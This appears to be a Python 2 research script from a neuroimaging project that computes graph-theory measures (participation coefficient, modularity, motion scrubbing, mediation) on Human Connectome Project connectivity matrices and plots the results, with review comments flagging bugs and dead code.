finished_subjects = []
variables = []
matrices = []
thresh_matrices = []
for subject in subjects:
s_matrix = []
if scrubbed == True:
files = glob.glob('%sdynamic_mod/%s_matrices/%s_%s_*%s*_matrix_scrubbed_0.2.npy'%(homedir,atlas,subject,atlas,task)) # FOR SCRUBBING ONLY
if scrubbed == False:
files = glob.glob('%sdynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%(homedir,atlas,subject,atlas,task))
for f in files:
if scrubbed == True:
# FOR SCRUBBING ONLY
dis_file = run_fd(subject,'_'.join(f.split('/')[-1].split('_')[2:5]))
remove_array = np.zeros(len(dis_file))
for i,fdf in enumerate(dis_file):
if fdf > .2:
remove_array[i] = 1
if i == 0:
remove_array[i+1] = 1
continue
if i == len(dis_file)-1:
remove_array[i-1] = 1
continue
remove_array[i-1] = 1
remove_array[i+1] = 1
if len(remove_array[remove_array==1])/float(len(remove_array)) > .75:
continue
f = np.load(f)
1/0
np.fill_diagonal(f,0.0)
f[np.isnan(f)] = 0.0
f = np.arctanh(f)
s_matrix.append(f.copy())
if len(s_matrix) == 0:
continue
s_matrix = np.nanmean(s_matrix,axis=0)
variables.append([subject,atlas,task,s_matrix.copy()])
num_nodes = s_matrix.shape[0]
thresh_matrix = s_matrix.copy()
thresh_matrix = scipy.stats.zscore(thresh_matrix.reshape(-1)).reshape((num_nodes,num_nodes))
thresh_matrices.append(thresh_matrix.copy())
matrices.append(s_matrix.copy())
finished_subjects.append(subject)
subject_mods = [] #individual subject modularity values
subject_pcs = [] #subjects PCs
subject_wmds = []
subject_communities = []
assert len(variables) == len(finished_subjects)
print 'Running Graph Theory Analyses'
from multiprocessing import Pool
pool = Pool(18)
results = pool.map(individual_graph_analyes_wc,variables)
for r,s in zip(results,finished_subjects):
subject_mods.append(np.nanmean(r[0]))
subject_pcs.append(r[1])
subject_wmds.append(r[2])
subject_communities.append(r[3])
assert r[4] == s #make sure it returned the order of subjects/results correctly
np.save('%sdynamic_mod/results/%s_%s_%s_pcs_%s.npy' %(homedir,project,task,atlas,run_version),np.array(subject_pcs))
np.save('%sdynamic_mod/results/%s_%s_%s_wmds_%s.npy' %(homedir,project,task,atlas,run_version),np.array(subject_wmds))
np.save('%sdynamic_mod/results/%s_%s_%s_mods_%s.npy' %(homedir,project,task,atlas,run_version),np.array(subject_mods))
np.save('%sdynamic_mod/results/%s_%s_%s_subs_%s.npy' %(homedir,project,task,atlas,run_version),np.array(finished_subjects))
np.save('%sdynamic_mod/results/%s_%s_%s_matrices_%s.npy'%(homedir,project,task,atlas,run_version),np.array(matrices))
np.save('%sdynamic_mod/results/%s_%s_%s_coms_%s.npy' %(homedir,project,task,atlas,run_version),np.array(subject_communities))
np.save('%sdynamic_mod/results/%s_%s_%s_z_matrices_%s.npy'%(homedir,project,task,atlas,run_version),np.array(thresh_matrices))
subject_mods = np.array(subject_mods)
subject_pcs = np.array(subject_pcs)
subject_wmds = np.array(subject_wmds)
subject_communities = np.array(subject_communities)
matrices = np.array(matrices)
thresh_matrices = np.array(thresh_matrices)
results = {}
results['subject_pcs'] = subject_pcs
results['subject_mods'] = subject_mods
results['subject_wmds'] = subject_wmds
results['subject_communities'] = subject_communities
results['matrices'] = matrices
del matrices
results['z_scored_matrices'] = thresh_matrices
results['subjects'] = finished_subjects
del thresh_matrices
return results
def pc_edge_correlation(subject_pcs,matrices,path):
    """Correlate each node's PC across subjects with every edge weight.

    subject_pcs: (n_subjects, n_nodes) participation coefficients; NaNs are
        replaced with 0 in place before correlating.
    matrices: (n_subjects, n_nodes, n_nodes) connectivity matrices.
    path: .npy cache file; the result is loaded from there when it exists
        and is computed (then saved there) otherwise.

    Returns an (n_nodes, n_nodes, n_nodes) array where [i, n1, n2] is the
    Pearson r between node i's PC and edge (n1, n2) across subjects.
    """
    try:
        pc_edge_corr = np.load(path)
    except (IOError, OSError, ValueError):
        # BUG FIX: was a bare `except:`, which also swallowed unrelated
        # errors (KeyboardInterrupt, NameError, ...). Only a missing or
        # unreadable cache file should trigger recomputation.
        pc_edge_corr = np.zeros((subject_pcs.shape[1],subject_pcs.shape[1],subject_pcs.shape[1]))
        subject_pcs[np.isnan(subject_pcs)] = 0.0
        for i in range(subject_pcs.shape[1]):
            for n1,n2 in combinations(range(subject_pcs.shape[1]),2):
                val = pearsonr(subject_pcs[:,i],matrices[:,n1,n2])[0]
                pc_edge_corr[i,n1,n2] = val
                pc_edge_corr[i,n2,n1] = val
        np.save(path,pc_edge_corr)
    return pc_edge_corr
def pc_edge_q_figure(tasks = ['REST','WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL']):
    """
    edge weight mediation of pearsonr(PC,Q) =
    (regression coefficient of edge weight by PC) How much variance in the edge is explained by PC
    (regression coefficient of Q by edge weight, controlling for PC) How much variance in Q is explained by the edge weight, controlling for PC.

    Builds task-averaged Q-edge and PC-edge correlation matrices, saves the
    matrix figures and a violin plot of connector-hub mediation t values.
    """
    driver = 'PC'
    project='hcp'
    # NOTE(review): this reassignment ignores the `tasks` argument.
    tasks = ['REST','WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL']
    atlas = 'power'
    run_version = 'fz'
    known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
    q_corr_matrix = []
    pc_corr_matrix = []
    #order by primary versus secondary networks.
    network_order = ['Auditory','Sensory/somatomotor Hand','Sensory/somatomotor Mouth','Visual','Dorsal attention','Ventral attention',
    'Cingulo-opercular Task Control','Salience','Fronto-parietal Task Control','Default mode','Cerebellar','Subcortical','Memory retrieval?','Uncertain']
    colors = np.array(pd.read_csv('%smodularity/Consensus264.csv'%(homedir),header=None)[34].values)
    colors[colors=='Pale blue'] = '#ADD8E6'
    colors[colors=='Teal'] = '#008080'
    # node permutation that groups nodes by network, in network_order
    swap_indices = []
    for nn in network_order:
        original_idx = np.where(network_names == nn)
        for i in range(len(original_idx[0])):
            swap_indices.append(original_idx[0][i])
    locality_df = pd.DataFrame()
    # NOTE(review): this local `stats` shadows the module-level
    # `from scipy import stats` inside this function; it is never used.
    stats = []
    for task in tasks:
        print task
        subjects = np.load('%sdynamic_mod/results/%s_%s_%s_subs_%s.npy' %(homedir,project,task,atlas,run_version))
        static_results = graph_metrics(subjects,task,atlas,run_version)
        subject_pcs = static_results['subject_pcs']
        subject_mods = static_results['subject_mods']
        subject_wmds = static_results['subject_wmds']
        matrices = static_results['matrices']
        assert subject_pcs.shape[0] == len(subjects)
        mean_pc = np.nanmean(subject_pcs,axis=0)
        mean_wmd = np.nanmean(subject_wmds,axis=0)
        # per-node correlation of PC (and WMD) with whole-brain Q
        mod_pc_corr = np.zeros(subject_pcs.shape[1])
        for i in range(subject_pcs.shape[1]):
            mod_pc_corr[i] = nan_pearsonr(subject_mods,subject_pcs[:,i])[0]
        mod_wmd_corr = np.zeros(subject_wmds.shape[1])
        for i in range(subject_wmds.shape[1]):
            mod_wmd_corr[i] = nan_pearsonr(subject_mods,subject_wmds[:,i])[0]
        if driver == 'PC': m = np.load('%s/dynamic_mod/results/full_med_matrix_new_%s.npy'%(homedir,task))
        else: m = np.load('%s/dynamic_mod/results/full_med_matrix_new_%s_wmds.npy'%(homedir,task))
        mean_conn = np.nanmean(matrices,axis=0)
        e_tresh = np.percentile(mean_conn,85)
        # t test: is each node's mediation stronger at its (top-15%) neighbors
        # than at its non-neighbors?
        for i in range(264):
            real_t = scipy.stats.ttest_ind(np.abs(m)[i][np.argwhere(mean_conn[i]>=e_tresh)][:,:,np.arange(264)!=i].reshape(-1),np.abs(m)[i][np.argwhere(mean_conn[i]<e_tresh)][:,:,np.arange(264)!=i].reshape(-1))[0]
            # real_t = scipy.stats.ttest_ind(m[i][np.argwhere(mean_conn[i]>=e_tresh)][:,:,np.arange(264)!=i].reshape(-1),m[i][np.argwhere(mean_conn[i]<e_tresh)][:,:,np.arange(264)!=i].reshape(-1))[0]
            if mod_pc_corr[i] > 0.0:
                locality_df = locality_df.append({"Node Type":'Connector Hub','t':real_t,'Task':task.capitalize()},ignore_index=True)
            else:
                locality_df = locality_df.append({"Node Type":'Local Node','t':real_t,'Task':task.capitalize()},ignore_index=True)
        locality_df.dropna(inplace=True)
        if driver == 'PC':
            predict_nodes = np.where(mod_pc_corr>0.0)[0]
            local_predict_nodes = np.where(mod_pc_corr<0.0)[0]
            pc_edge_corr = np.arctanh(pc_edge_correlation(subject_pcs,matrices,path='%s/dynamic_mod/results/%s_%s_%s_pc_edge_corr_z.npy' %(homedir,project,task,atlas)))
        if driver == 'WMD':
            predict_nodes = np.where(mod_wmd_corr>0.0)[0]
            local_predict_nodes = np.where(mod_wmd_corr<0.0)[0]
            pc_edge_corr = np.arctanh(pc_edge_correlation(subject_wmds,matrices,path='%s/dynamic_mod/results/%s_%s_%s_wmd_edge_corr_z.npy' %(homedir,project,task,atlas)))
        n_nodes = pc_edge_corr.shape[0]
        # correlation of every edge with Q across subjects
        q_edge_corr = np.zeros((n_nodes,n_nodes))
        perf_edge_corr = np.zeros((n_nodes,n_nodes))
        for i,j in combinations(range(n_nodes),2):
            ijqcorr = nan_pearsonr(matrices[:,i,j],subject_mods)[0]
            q_edge_corr[i,j] = ijqcorr
            q_edge_corr[j,i] = ijqcorr
            # continue
            # if task not in ['WM','RELATIONAL','SOCIAL','LANGUAGE']:
            # 	continue
            # ijqcorr = nan_pearsonr(matrices[:,i,j],task_perf)[0]
            # perf_edge_corr[i,j] = ijqcorr
            # perf_edge_corr[j,i] = ijqcorr
        pc_corr_matrix.append(np.nanmean(pc_edge_corr[predict_nodes,:,:],axis=0))
        q_corr_matrix.append(q_edge_corr)
        # if task in ['WM','RELATIONAL','SOCIAL','LANGUAGE']:
        # 	print nan_pearsonr(perf_edge_corr.reshape(-1),np.nanmean(pc_edge_corr[predict_nodes,:,:],axis=0).reshape(-1))
        # plot_corr_matrix(perf_edge_corr[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_%s_edge_perf_corr_matrix.pdf'%(homedir,task,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
        # plot_corr_matrix(np.nanmean(m[predict_nodes,:,:],axis=0)[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_%s_%s_mediation_matrix.pdf'%(homedir,task,driver,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
        # plot_corr_matrix(np.nanmean(pc_edge_corr[predict_nodes],axis=0)[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_%s_pcedge__corr_matrix.pdf'%(homedir,task,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
        # plot_corr_matrix(q_edge_corr[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_%s_%s_qedgecorr_matrix.pdf'%(homedir,task,driver,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
    plot_corr_matrix(np.nanmean(q_corr_matrix,axis=0)[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_mean_q_corr_matrix.pdf'%(homedir,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
    plot_corr_matrix(np.nanmean(pc_corr_matrix,axis=0)[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_mean_pc_corr_matrix.pdf'%(homedir,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
    # NOTE(review): `m` and `predict_nodes` here hold values from the LAST
    # task in the loop only -- confirm that is intended for this figure.
    plot_corr_matrix(np.nanmean(m[predict_nodes,:,:],axis=0)[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file='%s/dynamic_mod/figures/%s_%s_mean_mediation_matrix_withbar.pdf'%(homedir,driver,run_version),reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
    # plot_corr_matrix(np.nanmean(pc_corr_matrix,axis=0)[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file=None,reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
    f = sns.plt.figure(figsize=(18,6))
    sns.set_style("white")
    sns.set_style("ticks")
    sns.set(context="paper",font='Helvetica',font_scale=1.2)
    sns.violinplot(data=locality_df[locality_df['Node Type']=='Connector Hub'],x='Task',y='t',hue='Task',inner='quartile',palette=sns.palettes.color_palette('Paired',7))
    sns.plt.ylabel("T Test Values, mediation values of node's nieghbors \n versus mediation of node's non-neighbors")
    sns.plt.legend(bbox_to_anchor=[1,1.05],ncol=7,columnspacing=10)
    sns.plt.savefig('%s/dynamic_mod/figures/%s_mediation_t_test.pdf'%(homedir,run_version))
    sns.plt.show()
    # plot_corr_matrix(mean_conn[:,swap_indices][swap_indices],network_names[swap_indices].copy(),out_file=None,reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
def network_labels(atlas):
	"""Load community (network) labels for the requested parcellation.

	Returns a 4-tuple:
	  known_membership -- integer community id per node (0 means unassigned)
	  network_names    -- community name per node, as strings
	  num_nodes        -- number of nodes in the atlas
	  name_int_dict    -- mapping from community id to community name
	"""
	if atlas == 'gordon':
		df = pd.read_excel('%sdynamic_mod/Parcels.xlsx'%(homedir))
		df.Community[df.Community=='None'] = 'Uncertain'
		# give each distinct community name a stable integer id
		community_ids = {}
		for idx,label in enumerate(np.unique(df.Community.values)):
			community_ids[label] = idx
		known_membership = np.zeros((333))
		for node in range(333):
			known_membership[node] = community_ids[df.Community[node]]
		network_names = np.array(df.Community.values).astype(str)
	if atlas == 'power':
		known_membership = np.array(pd.read_csv('%smodularity/Consensus264.csv'%(homedir),header=None)[31].values)
		known_membership[known_membership==-1] = 0
		network_names = np.array(pd.read_csv('%smodularity/Consensus264.csv'%(homedir),header=None)[36].values)
	# id -> name lookup; on duplicate ids the later node wins, as before
	name_int_dict = {membership:label for label,membership in zip(network_names,known_membership)}
	return known_membership,network_names,len(known_membership),name_int_dict
def split_connectivity_across_tasks(n_iters=10000):
	"""Split-half test: does nodal mean PC (or WCD) track the node's PC-Q (WCD-Q) coupling?

	For each HCP task the subject pool is repeatedly split in half; nodal mean
	PC/WCD is computed on one half and the node-wise correlation with Q on the
	other, then the two nodal vectors are correlated across nodes.  Results are
	cached in split_corrs.csv; if the cache exists, it is plotted directly.
	"""
	global hcp_subjects
	try:
		# fast path: reuse a previously computed result table
		df = pd.read_csv('/home/despoB/mb3152/dynamic_mod/results/split_corrs.csv')
	except:
		split = True
		tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST']
		project='hcp'
		atlas = 'power'
		known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
		df_columns=['Task','Pearson R, PC, PC & Q','Pearson R, WCD, WCD & Q']
		df = pd.DataFrame(columns = df_columns)
		for task in tasks:
			print task
			subjects = np.array(hcp_subjects).copy()
			subjects = list(subjects)
			subjects = remove_missing_subjects(subjects,task,atlas)
			# sanity check: filtered pool must match the cached subject list
			assert (subjects == np.load('/home/despoB/mb3152/dynamic_mod/results/hcp_%s_%s_subs_fz.npy'%(task,atlas))).all()
			static_results = graph_metrics(subjects,task,atlas)
			subject_pcs = static_results['subject_pcs']
			subject_mods = static_results['subject_mods']
			subject_wmds = static_results['subject_wmds']
			matrices = static_results['matrices']
			task_perf = task_performance(subjects,task)
			assert subject_pcs.shape[0] == len(subjects)
			wmd_rs = []
			pc_rs = []
			# NOTE(review): sklearn.cross_validation was removed in sklearn 0.20;
			# modern sklearn puts ShuffleSplit in sklearn.model_selection.
			from sklearn.cross_validation import ShuffleSplit
			for pc_subs,pc_mod_subjects in ShuffleSplit(n=len(subjects),n_iter=n_iters,train_size=.5,test_size=.5):
				mod_pc_corr = np.zeros(subject_pcs.shape[1])
				mod_wmd_corr = np.zeros(subject_pcs.shape[1])
				# nodal means from one half of the subjects...
				mean_pc = np.nanmean(subject_pcs[pc_subs,],axis=0)
				mean_wmd = np.nanmean(subject_wmds[pc_subs,],axis=0)
				# ...nodal coupling with Q estimated on the other half
				for i in range(subject_pcs.shape[1]):
					mod_pc_corr[i] = nan_pearsonr(subject_mods[pc_mod_subjects],subject_pcs[pc_mod_subjects,i])[0]
					mod_wmd_corr[i] = nan_pearsonr(subject_mods[pc_mod_subjects],subject_wmds[pc_mod_subjects,i])[0]
				df = df.append({'Task':task,'Pearson R, PC, PC & Q':nan_pearsonr(mod_pc_corr,mean_pc)[0],'Pearson R, WCD, WCD & Q':nan_pearsonr(mod_wmd_corr,mean_wmd)[0]},ignore_index=True)
			print np.mean(df['Pearson R, PC, PC & Q'][df.Task==task])
			print np.mean(df['Pearson R, WCD, WCD & Q'][df.Task==task])
			df.to_csv('/home/despoB/mb3152/dynamic_mod/results/split_corrs.csv')
	# violin plots of the split-half correlations, one per task
	sns.plt.figure(figsize=(20,10))
	sns.violinplot(data=df,y='Pearson R, PC, PC & Q',x='Task',inner='quartile')
	sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/split_pc.pdf',dpi=3600)
	sns.plt.close()
	sns.violinplot(data=df,y='Pearson R, WCD, WCD & Q',x='Task',inner='quartile')
	sns.plt.savefig('/home/despoB/mb3152/dynamic_mod/figures/split_wcd.pdf',dpi=3600)
	sns.plt.close()
def run_fd(subject,task):
	"""Return the cached framewise-displacement (FD) trace for one subject/run.

	Loads the cached FD array from motion_files if present.  On a cache miss it
	computes FD from the first six HCP movement regressors, prepends a 0 for
	the first frame (FD is undefined there), caches it, and returns it.

	Fixes vs. original: the bare ``except:`` (which swallowed every error,
	including KeyboardInterrupt) is narrowed to the file-not-found case, and
	the redundant reload of the file that was just written is removed.
	"""
	outfile = '/home/despoB/mb3152/dynamic_mod/motion_files/%s_%s.npy' %(subject,task)
	try:
		return np.load(outfile)
	except IOError:
		# cache miss: derive FD from the raw movement regressors
		MP = np.loadtxt('/home/despoB/connectome-raw/%s/MNINonLinear/Results/%s/Movement_Regressors.txt'%(subject,task))
		FD = brain_graphs.compute_FD(MP[:,:6])
		FD = np.append(0,FD)
		np.save(outfile,FD)
		return FD
def get_sub_motion(subject,task):
	"""Mean motion for a subject/task from locally cached FD traces.

	Averages (nan-aware) the per-run mean of every cached motion file that
	matches the subject and task; returns NaN when no files are found.
	"""
	matches = glob.glob('/home/despoB/mb3152/dynamic_mod/motion_files/%s_*%s*' %(subject,task))
	if not matches:
		return np.nan
	per_run_means = [np.nanmean(np.load(match)) for match in matches]
	return np.nanmean(per_run_means)
def hcp_motion(subject,task):
	"""Mean of the HCP-supplied Movement_RelativeRMS_mean values for a subject/task.

	Averages (nan-aware) across all matching runs; NaN when no run matches.
	"""
	run_files = glob.glob('/home/despoB/connectome-raw/%s/MNINonLinear/Results/*%s*/Movement_RelativeRMS_mean.txt'%(subject,task))
	run_means = [np.nanmean(np.loadtxt(run_file)) for run_file in run_files]
	return np.nanmean(run_means)
def compare_motion_params(subjects,task):
	"""Collect per-subject motion estimates from both pipelines for comparison.

	Fixes vs. original: the parameters were ignored (it iterated the global
	``hcp_subjects`` and passed an empty task string) and the collected lists
	were discarded.  Now iterates ``subjects``, uses ``task``, and returns
	(my_ver, hcp_ver): locally computed vs HCP-supplied mean motion, one entry
	per subject.
	"""
	my_ver = []
	hcp_ver = []
	for s in subjects:
		my_ver.append(get_sub_motion(s,task))
		hcp_ver.append(hcp_motion(s,task))
	return my_ver,hcp_ver
def all_motion(tasks,atlas='power'):
	"""Pre-compute framewise-displacement traces for every subject and HCP run.

	NOTE(review): the ``tasks`` argument is ignored -- the hard-coded
	``everything`` list of HCP run directory names is what actually runs.
	"""
	everything = ['tfMRI_WM_RL','tfMRI_WM_LR','rfMRI_REST1_LR','rfMRI_REST2_LR','rfMRI_REST1_RL','rfMRI_REST2_RL','tfMRI_RELATIONAL_LR','tfMRI_RELATIONAL_RL','tfMRI_SOCIAL_RL','tfMRI_SOCIAL_LR','tfMRI_LANGUAGE_LR','tfMRI_LANGUAGE_RL','tfMRI_GAMBLING_RL','tfMRI_MOTOR_RL','tfMRI_GAMBLING_LR','tfMRI_MOTOR_LR']
	for task in everything:
		print task
		if 'REST' in task:
			# resting-state subject lists are keyed by the 4-char stem 'REST'
			subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',task.split('_')[1][:4],atlas))
		else:
			subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_fz.npy' %('hcp',task.split('_')[1],atlas))
		for subject in subjects:
			try:
				run_fd(subject,task)
			except:
				# best effort: report the failing subject/run and keep going
				print subject,task
def individual_differnce_networks(task,atlas='power',run_version='fz'):
	"""Plot how individual differences in connectivity co-vary across node pairs.

	diff_matrix[i,j] is the mean (over target nodes) correlation, across
	subjects, between node i's and node j's connectivity profiles -- i.e.
	whether individual differences in i's edges track those in j's edges.
	(Name typo 'differnce' kept intact: external callers may reference it.)
	"""
	known_membership,network_names,num_nodes,name_int_dict = network_labels(atlas)
	# fixed display ordering for the Power-atlas communities
	network_order = ['Auditory','Sensory/somatomotor Hand','Sensory/somatomotor Mouth','Visual','Dorsal attention','Ventral attention',
	'Cingulo-opercular Task Control','Salience','Fronto-parietal Task Control','Default mode','Cerebellar','Subcortical','Memory retrieval?','Uncertain']
	colors = np.array(pd.read_csv('%smodularity/Consensus264.csv'%(homedir),header=None)[34].values)
	# replace named colors with hex codes the plotting code understands
	colors[colors=='Pale blue'] = '#ADD8E6'
	colors[colors=='Teal'] = '#008080'
	# node permutation that groups nodes by community in display order
	swap_indices = []
	for nn in network_order:
		original_idx = np.where(network_names == nn)
		for i in range(len(original_idx[0])):
			swap_indices.append(original_idx[0][i])
	subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_%s.npy' %('hcp',task,atlas,run_version))
	static_results = graph_metrics(subjects,task,atlas,run_version=run_version)
	matrices = static_results['matrices']
	diff_matrix = np.zeros((264,264))
	for i,j in combinations(range(264),2):
		# mean across-subject correlation of node i's vs node j's edge profiles
		r = np.nanmean(np.diagonal(generate_correlation_map(matrices[:,i,:].swapaxes(0,1), matrices[:,j,:].swapaxes(0,1))))
		diff_matrix[i,j] = r
		diff_matrix[j,i] = r
	plot_corr_matrix(matrix=diff_matrix[:,swap_indices][swap_indices],membership=network_names[swap_indices].copy(),out_file=None,reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
	plot_corr_matrix(matrix=np.nanmean(matrices,axis=0)[:,swap_indices][swap_indices],membership=network_names[swap_indices].copy(),out_file=None,reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
	plot_corr_matrix(matrix=diff_matrix-np.nanmean(matrices,axis=0)[:,swap_indices][swap_indices],membership=network_names[swap_indices].copy(),out_file=None,reorder=False,colors=colors[swap_indices],line=True,draw_legend=True,rectangle=False)
	# per-network summaries of the difference between the two matrices
	for network in np.unique(network_names):
		print network, np.mean((diff_matrix-np.nanmean(matrices,axis=0))[network_names==network][:,network_names!=network])
	for network in np.unique(network_names):
		print network, scipy.stats.ttest_ind((diff_matrix-np.nanmean(matrices,axis=0))[network_names==network][:,network_names!=network].reshape(-1),(diff_matrix-np.nanmean(matrices,axis=0))[network_names==network][:,network_names==network].reshape(-1))
def make_mean_matrix():
	"""Rebuild each task's group-mean Fisher-z matrix and check it against the
	cached copy in diverse_club/graphs (the save line is deliberately disabled).
	"""
	atlas = 'power'
	for task in ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST']:
		print task
		matrix = []
		subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_power_subs_fz.npy' %('hcp',task))
		for subject in subjects:
			files = glob.glob('%sdynamic_mod/%s_matrices/%s_%s_*%s*_matrix.npy'%(homedir,atlas,subject,atlas,task))
			for f in files:
				f = np.load(f)
				# each matrix must be a valid correlation matrix: values <= 1,
				# zero diagonal, and symmetric (mmax is the max asymmetry)
				assert np.nanmax(f) <= 1.
				np.fill_diagonal(f,0.0)
				mmax = np.nanmax(abs(np.tril(f,-1) - np.triu(f,1).transpose()))
				if mmax != 0.0: print subject
				assert np.isclose(mmax,0)
				# Fisher z-transform before averaging across runs/subjects
				f = np.arctanh(f)
				matrix.append(f.copy())
		matrix = np.nanmean(matrix,axis=0)
		print np.min(np.max(matrix,axis=1))
		# verify against the previously saved group matrix
		assert (matrix == np.load('/home/despoB/mb3152/diverse_club/graphs/%s.npy'%(task))).all() == True
		# np.save('/home/despoB/mb3152/diverse_club/graphs/%s.npy'%(task),matrix)
def connectivity_across_tasks(atlas='power',project='hcp',tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST'],run_version='fz_wc',control_com=False,control_motion=False):
	"""Per task, relate each node's PC/WCD to subject-level modularity (Q).

	Builds two long DataFrames (pc_df, wmd_df) holding, per node and task, the
	nodal mean PC/WCD and its across-subject correlation with Q, optionally
	residualizing Q on motion and/or number of communities first.

	NOTE(review): every keyword argument is immediately overwritten by the
	hard-coded locals below, and the ``continue`` at the end of the task loop
	makes the BrainNet figure-rendering code after it unreachable.
	"""
	import matlab
	import matlab.engine
	eng = matlab.engine.start_matlab()
	eng.addpath('/home/despoB/mb3152/BrainNet/')
	# hard-coded settings shadow the function arguments (see docstring note)
	atlas='power'
	project='hcp'
	tasks = ['WM','GAMBLING','RELATIONAL','MOTOR','LANGUAGE','SOCIAL','REST']
	run_version='fz_wc'
	control_com=False
	control_motion=False
	pc_df = pd.DataFrame(columns=['Task','Mean Participation Coefficient','Diversity Facilitated Modularity Coefficient'])
	wmd_df = pd.DataFrame(columns=['Task','Mean Within-Community-Strength','Locality Facilitated Modularity Coefficient'])
	for task in tasks:
		print task
		subjects = np.load('/home/despoB/mb3152/dynamic_mod/results/%s_%s_%s_subs_%s.npy' %('hcp',task,atlas,run_version))
		static_results = graph_metrics(subjects,task,atlas,run_version=run_version)
		subject_pcs = static_results['subject_pcs']
		subject_mods = static_results['subject_mods']
		subject_wmds = static_results['subject_wmds']
		subject_communities = static_results['subject_communities']
		matrices = static_results['matrices']
		subjects = static_results['subjects']
		if control_motion == True:
			subject_motion = []
			for subject in subjects:
				subject_motion.append(get_sub_motion(subject,task))
			# motion estimates must exist and be positive for every subject
			assert (np.isnan(subject_motion)==True).any() == False
			assert np.min(subject_motion) > 0.
		mean_pc = np.nanmean(static_results['subject_pcs'],axis=0)
		mean_wmd = np.nanmean(static_results['subject_wmds'],axis=0)
		mod_pc_corr = np.zeros(subject_pcs.shape[1])
		mod_wmd_corr = np.zeros(subject_pcs.shape[1])
		# optionally residualize Q on nuisance variables; the asserts confirm
		# the residuals are orthogonal to the regressors
		if control_com == True and control_motion == True:
			model_vars = np.array([subject_motion,subject_communities]).transpose()
			r_mod = sm.GLM(subject_mods,sm.add_constant(model_vars)).fit()
			assert np.isclose(0.0,pearsonr(r_mod.resid_response,subject_motion)[0]) == True
			assert np.isclose(0.0,pearsonr(r_mod.resid_response,subject_communities)[0]) == True
			c_str = 'Motion and Number of Communities'
			subject_mods = r_mod.resid_response
		if control_com == True and control_motion == False:
			r_mod = sm.GLM(subject_mods,sm.add_constant(subject_communities)).fit()
			assert np.isclose(0.0,pearsonr(r_mod.resid_response,subject_communities)[0]) == True
			c_str = 'Number of Communities'
			subject_mods = r_mod.resid_response
		if control_com == False and control_motion == True:
			r_mod = sm.GLM(subject_mods,sm.add_constant(subject_motion)).fit()
			assert np.isclose(0.0,pearsonr(r_mod.resid_response,subject_motion)[0]) == True
			c_str = 'Motion'
			subject_mods = r_mod.resid_response
		# node-wise correlation of PC / WCD with (possibly residualized) Q
		for i in range(subject_pcs.shape[1]):
			mod_pc_corr[i] = nan_pearsonr(subject_pcs[:,i],subject_mods)[0]
		for i in range(subject_pcs.shape[1]):
			mod_wmd_corr[i] = nan_pearsonr(subject_wmds[:,i],subject_mods)[0]
		task_str = np.zeros((len(mean_pc))).astype(str)
		task_str[:] = task
		pc_df = pc_df.append(pd.DataFrame(np.array([task_str,mean_pc,mod_pc_corr]).transpose(),columns=['Task','Mean Participation Coefficient','Diversity Facilitated Modularity Coefficient']),ignore_index=True)
		wmd_df = wmd_df.append(pd.DataFrame(np.array([task_str,mean_wmd,mod_wmd_corr]).transpose(),columns=['Task','Mean Within-Community-Strength','Locality Facilitated Modularity Coefficient']),ignore_index=True)
		# everything below this continue is dead code (BrainNet rendering)
		continue
		import matlab
		# pc values
		write_df = pd.read_csv('/home/despoB/mb3152/BrainNet/Data/ExampleFiles/Power264/Node_Power264.node',header=None,sep='\t')
		pcs = np.nanmean(subject_pcs,axis=0)
		write_df[3] = pcs
		write_df = write_df[write_df[3]>np.percentile(write_df[3].values,80)]
		write_df.to_csv('/home/despoB/mb3152/dynamic_mod/brain_figures/power_pc_%s.node'%(task),sep='\t',index=False,names=False,header=False)
		node_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/power_pc_%s.node'%(task)
		surf_file = '/home/despoB/mb3152/BrainNet/Data/SurfTemplate/BrainMesh_ICBM152_smoothed.nv'
		img_file = '/home/despoB/mb3152/dynamic_mod/brain_figures/pc_%s.png' %(task)
		configs = '/home/despoB/mb3152/BrainNet/pc_values_thresh.mat'
		eng.BrainNet_MapCfg(node_file,surf_file,configs,img_file)
		#mod pc values
		write_df = pd.read_csv('/home/despoB/mb3152/BrainNet/Data/ExampleFiles/Power264/Node_Power264.node',header=None,sep='\t')
		write_df[3] = mod_pc_corr
		write_df = write_df[write_df[3]>np.percentile(write_df[3].values,80)]
